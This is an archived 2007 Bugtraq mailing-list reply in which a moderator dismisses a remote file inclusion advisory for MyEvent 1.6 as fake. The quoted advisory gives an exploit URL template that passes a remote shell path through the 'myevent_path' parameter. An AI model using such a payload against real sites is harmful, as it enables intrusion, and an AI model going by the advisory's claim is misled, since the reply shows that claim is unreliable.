lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 2 Jun 2007 11:17:09 -0500 From: str0ke <str0ke@...w0rm.com> To: "yaser@...cturk.net" <yaser@...cturk.net> Cc: bugtraq@...urityfocus.com Subject: Re: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability Another fake, the entire file is a class. /str0ke On 2 Jun 2007 07:07:53 -0000, yaser@...cturk.net <yaser@...cturk.net> wrote: > ######################################################################### > # > # MyEvent1.6 (template.php) Remote File Inclusion Vulnerability > # > # Author: Yaser <yaser@...cturk.net> > # > # Homepage: http://www.ayyildiz.org > # > ######################################################################### > > > > ######################################################################### > # Download S : http://mywebland.com/download.php?id=6 > # > # ERROR: > # > # include_once($myevent_path.'includes/template.php') > # > # Exploit: > # http://[site]/[PaTh]/includes/template.php?myevent_path=[shell] > # > ######################################################################### > > Thanks: ir4dex - ht08 - ajann - H0tturk - Zakix - Devil Hacker >
Powered by blists - more mailing lists